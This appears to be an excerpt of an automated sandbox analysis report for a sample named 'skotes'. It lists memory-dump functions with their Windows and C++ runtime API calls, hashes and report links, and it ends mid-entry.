std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A139

Strings

pScheduler, xrefs: 0042A131

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 682a3eefa47bedf4d22a1faa156ea6bcc2a49e045c4e2ce76e6417afd79e9783
Instruction ID: 10cbf4c553f32a99b29d21dedcc7eb1d51cf5285ac80ee2cb09dfeade9188058
Opcode Fuzzy Hash: 682a3eefa47bedf4d22a1faa156ea6bcc2a49e045c4e2ce76e6417afd79e9783
Instruction Fuzzy Hash: 56F02B35700224A38720FA55FC428AEF3789F80729BA0812FEC0517182DB7CAA19C69E

Function 020C0081 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,%C,?,020D0C8C,000000FF,0000000C), ref: 020C0098
GetLastError.KERNEL32(?,020D0C8C,?,00430925,?,?,?,?,?,?,020C5F15,?), ref: 020C00A7
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 020C00BD

Strings

%C, xrefs: 020C0094

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
String ID: %C
API String ID: 2296417588-4291884666
Opcode ID: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
Instruction ID: 4cc058e9094b61250ab4f4be844a940fbff0c103be945185c8052eefa72a917d
Opcode Fuzzy Hash: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
Instruction Fuzzy Hash: 2CF08C7560030AEBCB01EFA59D05EAE37ADAB00716F200528B520E2091DB35D604AB65

Function 020BD400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.NTDLL(00465750), ref: 020BD42D
WaitForSingleObjectEx.KERNEL32(00468680,00000000,?,020BD39D,00000064,?,0045007C,?,020A7854,00468680), ref: 020BD43E
RtlEnterCriticalSection.NTDLL(00465750), ref: 020BD445

Strings

PWF, xrefs: 020BD427

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWait
String ID: PWF
API String ID: 501323975-4189640852
Opcode ID: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
Instruction ID: 7a8316f09701e60cfe93341056e371581af3417cd6ec4ba159350735b49ca3eb
Opcode Fuzzy Hash: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
Instruction Fuzzy Hash: 2AE01235541B24F7C7121B50EC09B9E7F68EF45753F044031FA05661619BA56C40DBDF

Function 020A7F97 Relevance: 6.4, APIs: 4, Instructions: 422libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,00462014), ref: 020A8011
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020A8072
GetProcAddress.KERNEL32(00000000), ref: 020A8079
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020A813E

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleProcSystemVersion
String ID:
API String ID: 1456109104-0
Opcode ID: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
Instruction ID: 3eded89d2c03bfe5ea499b3bbdc289a54818c344e6d51dd5faa474aa661f437c
Opcode Fuzzy Hash: f86739a690633f7d14615720dab4f5b7d6e0e144a36365c4640fb5ca6efcc30f
Instruction Fuzzy Hash: 47E10571F00354ABDB29BBA8CD567DC7A62AB85710FD4429CD8156B3C0EB758E409F83

Function 020DCE46 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 020DCECD

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
Instruction ID: dc1fa37fb139368600b575562612bd2dbe6497366736f40a13d6193a9bc6ccf7
Opcode Fuzzy Hash: d1e2580fea8bb5659ef3a0ec9f2bd8d3f247a712cc4476731abb6eb94a7ef4ee
Instruction Fuzzy Hash: 86B128729023859FEB12CF28C880BFEBFF6EF85344F1481AAD9559B241D7359942DB60

Function 020D52B5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 020D537C
___AdjustPointer.LIBCMT ref: 020D539F
___AdjustPointer.LIBCMT ref: 020D543B

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
Instruction ID: bb94df2d9acff2d7eeba2d72618d04efc81274f3deb97bd0ce416a4b7a72fd48
Opcode Fuzzy Hash: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
Instruction Fuzzy Hash: DC51B3726027069FDB2A8F54DC80BBA7BF5EF04319F94492DEC0657590E7B1E880EB51

Function 0043504E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00435115
___AdjustPointer.LIBCMT ref: 00435138
___AdjustPointer.LIBCMT ref: 004351D4

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 24256a6a0eee4dc051d6a34bfd34133c294509d047b55e93e8e20eb2f16a28ea
Instruction ID: de7e3e00fb04a34b96eeb7253be455e546d1f1f5c91bb76df3f696651397a324
Opcode Fuzzy Hash: 24256a6a0eee4dc051d6a34bfd34133c294509d047b55e93e8e20eb2f16a28ea
Instruction Fuzzy Hash: 5851E171A01A06AFEF289F55D841BBB73B4EF18304F14516FE80197291E739ED41CB99

Function 020A85E7 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 020A8660
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020A86C7
GetProcAddress.KERNEL32(00000000), ref: 020A86CE

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
Instruction ID: 72492961db063e1a81c2168fc2b3007cad295edbc7c23897f7d3146a13cd3530
Opcode Fuzzy Hash: a9352ec7e219f5b0e6875a96d9916c0a74e731d0ff9642be5bb7f7817e9f41d6
Instruction Fuzzy Hash: DA511971D003049BEB28EBA8DD887DDB775EF45315F9082A8E405A72D0EB35DA80DF95

Function 00408380 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,3FA3610C), ref: 004083F9
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408460
GetProcAddress.KERNEL32(00000000), ref: 00408467

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 3a9a6616743496babd75a57264d9c112cc3b8580f8eefccc93ff8829d01ba640
Instruction ID: 938ad35630e66277154cddf74743d86f98c067e6d70a9bb90e20810804f89ef8
Opcode Fuzzy Hash: 3a9a6616743496babd75a57264d9c112cc3b8580f8eefccc93ff8829d01ba640
Instruction Fuzzy Hash: E9510870D00214ABDB14EF68DE497DEBB74EB46314F5042BEE445A72C1EF389AC48B99

Function 020D4E7C Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 020D4ECD
TypeidsEqual.LIBVCRUNTIME ref: 020D4EF2
PMDtoOffset.LIBCMT ref: 020D4F08
PMDtoOffset.LIBCMT ref: 020D4F89

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: 57b41e7f8b74fd982d79e1c0bb939b3d84d387ddbce0f1cca9dc982a34ff3d1e
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: 5751AD35D0530A9FCF12CF69C480AEEFBF5EF05218F15449AE851A7360D732AA44DB90

Function 020E6235 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 020E6305
_free.LIBCMT ref: 020E632E
SetEndOfFile.KERNEL32(00000000,020E1C71,00000000,020DAEF9,?,?,?,?,?,?,?,020E1C71,020DAEF9,00000000), ref: 020E6360
GetLastError.KERNEL32(?,?,?,?,?,?,?,020E1C71,020DAEF9,00000000,?,?,?,?,00000000), ref: 020E637C

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
Instruction ID: a69063bd2c0f3ac7ab4639533929f2b54ea90634f52e7bb9a3940dee490ecaaf
Opcode Fuzzy Hash: 6fb0f9e19d4acd712ab8c7b746a97e06f48a18ddc77e8d7a73dfb4aa9b2b61d0
Instruction Fuzzy Hash: 1741E8329407459FDF126BB8EC80BDD77AEAF55320F140514F836E71A0EB32C880AB61

Function 020A3127 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 020A31C6
GetCurrentThreadId.KERNEL32 ref: 020A31E5
__Mtx_unlock.LIBCPMT ref: 020A3233
__Cnd_broadcast.LIBCPMT ref: 020A324A

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
Instruction ID: 9f50158c6062811002151f66a209298f5956464995d00d80f09ab12d3cfd7c43
Opcode Fuzzy Hash: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
Instruction Fuzzy Hash: B141AFB0900715AFEB22DFA5C94479AB7E8FF05324F00456AD816D7650EB34EA04EB81

Function 020D1D90 Relevance: 6.1, APIs: 4, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 020D1DA9

Part of subcall function 020D2078: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,020D1AF1), ref: 020D2088

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 020D1DBE
std::invalid_argument::invalid_argument.LIBCONCRT ref: 020D1DCD
std::invalid_argument::invalid_argument.LIBCONCRT ref: 020D1E91

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID:
API String ID: 1312548968-0
Opcode ID: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction ID: 7db8d85eb8209abb5e20e890df9c019088b78ff98731ce018e8555ff682c2013
Opcode Fuzzy Hash: 84332b62cc3de3cfa4170185330e29230a9dc1dcd046b531a1b7116e20220df0
Instruction Fuzzy Hash: 8A31C535A01314AFCF16EF68C884AADB3B6BF44310F204569ED1597281DF70EE05EA94

Function 020C2F63 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 020C2F76

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
Instruction ID: 0e5c0bad46dd0a48f94ee58cc7c93800dbf7d449bdc5475cc68ec57fe6db3c81
Opcode Fuzzy Hash: 22ca41de25d3fddfd321250d59b84d7d3dba6f78c4a0763dc9e7bbb86f5d08b7
Instruction Fuzzy Hash: A8316BB6A00309DFCF11DF54C4D0BAE7BB9BB44314F2440AEDD01AB246D731A945EBA0

Function 020DDBB6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 020D6C33: _free.LIBCMT ref: 020D6C41

Part of subcall function 020DEB8D: WideCharToMultiByte.KERNEL32(020A8A07,00000000,0045FB20,00000000,020A8A07,020A8A07,020E08B7,?,0045FB20,?,00000000,?,020E0626,0000FDE9,00000000,?), ref: 020DEC2F

GetLastError.KERNEL32 ref: 020DDC1E
__dosmaperr.LIBCMT ref: 020DDC25
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 020DDC64
__dosmaperr.LIBCMT ref: 020DDC6B

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
Instruction ID: 50b47f6eb5395cbdadc649ff11899b856b853b9d0b35c9d1d8d1ddc6ce59fa04
Opcode Fuzzy Hash: e192af22dab1e85764783ba134b35ca1a0735bfe77ce3258f04da4e50815c0b3
Instruction Fuzzy Hash: D221B672642306AFDB616F61CC80EABB7EDEF04374B004918E82997550D771EC40BBA0

Function 0043D94F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 004369CC: _free.LIBCMT ref: 004369DA

Part of subcall function 0043E926: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00444DC0,?,00000000,00000000), ref: 0043E9C8

GetLastError.KERNEL32 ref: 0043D9B7
__dosmaperr.LIBCMT ref: 0043D9BE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0043D9FD
__dosmaperr.LIBCMT ref: 0043DA04

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e64aadb6d22fe51e849137b99b89815b7d15ae6c09361cf92410591095803afc
Instruction ID: ee20851a037b4c6b58bdbb56dc4c6e04abe5cdf536cd6285cafdd1b842c948ea
Opcode Fuzzy Hash: e64aadb6d22fe51e849137b99b89815b7d15ae6c09361cf92410591095803afc
Instruction Fuzzy Hash: DB21FBF1A04605BFDB206F66AC80E2777ACEF0C368F10511AF86997251D738EC418799

Function 020D1A91 Relevance: 6.1, APIs: 4, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 020D1AEC
std::invalid_argument::invalid_argument.LIBCONCRT ref: 020D1B0B
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 020D1B52

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 1284976207-0
Opcode ID: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction ID: f2369061bab4bf802ceb37aba0a1adf5325a17ac8ad964b8b556fde2c1278369
Opcode Fuzzy Hash: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction Fuzzy Hash: 442144357017159FCB06AB6CD894BADF3B6BF80334B00012AE41A872E1DF64A842EE94

Function 020D0CFF Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 020D0D50
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 020D0D38

Part of subcall function 020C9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 020C91B7

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 020D0DB3
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F4C0), ref: 020D0DB8

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction ID: cdd0a6a8ca8c8b5018f137af4b92c597423edea161eab29a7ebf67614a65f519
Opcode Fuzzy Hash: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction Fuzzy Hash: E521F979600314AFC710EB58CC48DAEB7BEEF48360F14055AFA16A32D1DB70AD01DEA5

Function 00430A98 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 00430AE9
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430AD1

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00430B4C
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,0045F4C0), ref: 00430B51

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction ID: eb585ae1b4d53eae47272984182226d4372f2576b54a2ee7974d2067b554b9fa
Opcode Fuzzy Hash: 2e8a3a5ddc2bebb452bc5efae35c7b376e30f6768224933571346adf22c5373c
Instruction Fuzzy Hash: 54210475700224AFCB10EB59DC45D7EB7A8EF48324F15015BFA16A3292CB74AD018AA9

Function 020DB3E4 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction ID: a102a26ef0240c2a661d02c1f72157da0acb5e0ff2850f7382dbd8faf9a39f62
Opcode Fuzzy Hash: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction Fuzzy Hash: 9D21C335A43324ABCB72CA649C45B5F37989B117ACF120525EC05A72A1D730FD00EAE4

Function 020C5109 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 020C5168
std::invalid_argument::invalid_argument.LIBCONCRT ref: 020C518B
__EH_prolog3.LIBCMT ref: 020C51A6
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 020C51CD

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$H_prolog3Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID:
API String ID: 2642201467-0
Opcode ID: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
Instruction ID: 8c101f338d17916e2ae3d9493de549959352c93c99827d49ab4d3dbd85a4603f
Opcode Fuzzy Hash: 8c7b1ccd00f45581bab929026422e21ff28f01d8dc45cb75e357af66afe4e75e
Instruction Fuzzy Hash: DC21DE79600305EFCB15EF58C884AAD77B6FF48311F60402EE905AB790DB71AA01EF55

Function 020D1599 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 020D162D
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 020D15DE

Part of subcall function 020C8582: SafeRWList.LIBCONCRT ref: 020C8593

SafeRWList.LIBCONCRT ref: 020D1623
Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 020D1643

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::ContextListSafeStealer$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 336577199-0
Opcode ID: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
Instruction ID: 0285db58a6f1f7063c63e17c6936b1afe8dda1d3062674c51d1e1547083af50a
Opcode Fuzzy Hash: 633f29ab29772fce27dba393e8379a29e8a0d8340c800c4eeedaee01f30ccdc5
Instruction Fuzzy Hash: BE21C57160530AEBCB45DF24C880FA9FBEABF85318F14D2AAD40A4B541DB75E685DBC0

Function 020D621E Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
Instruction ID: 0e239c40d6f0b882594e9c292d60a5c12b6ad54883d7de622bc2eb67e03f6688
Opcode Fuzzy Hash: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
Instruction Fuzzy Hash: CD11E635A43B25ABCB638F68BC84B7E379C9F017A0F110621E801A7290D771ED04E6E4

Function 020BF554 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 020BF576

Part of subcall function 020BF732: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 020C56ED

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 020BF597

Part of subcall function 020C0419: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 020C0435

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 020BF5B3
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 020BF5BA

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction ID: b7a503b0b1e97d4f0fc8ac8002e8236ab0e21a4a5b5649491fb78bf74156ead7
Opcode Fuzzy Hash: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction Fuzzy Hash: 440104B1500306BFD7326F688C849EFBBADDF10344B10452AF95593981D770A645EAA1

Function 0041F2ED Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041F30F

Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486

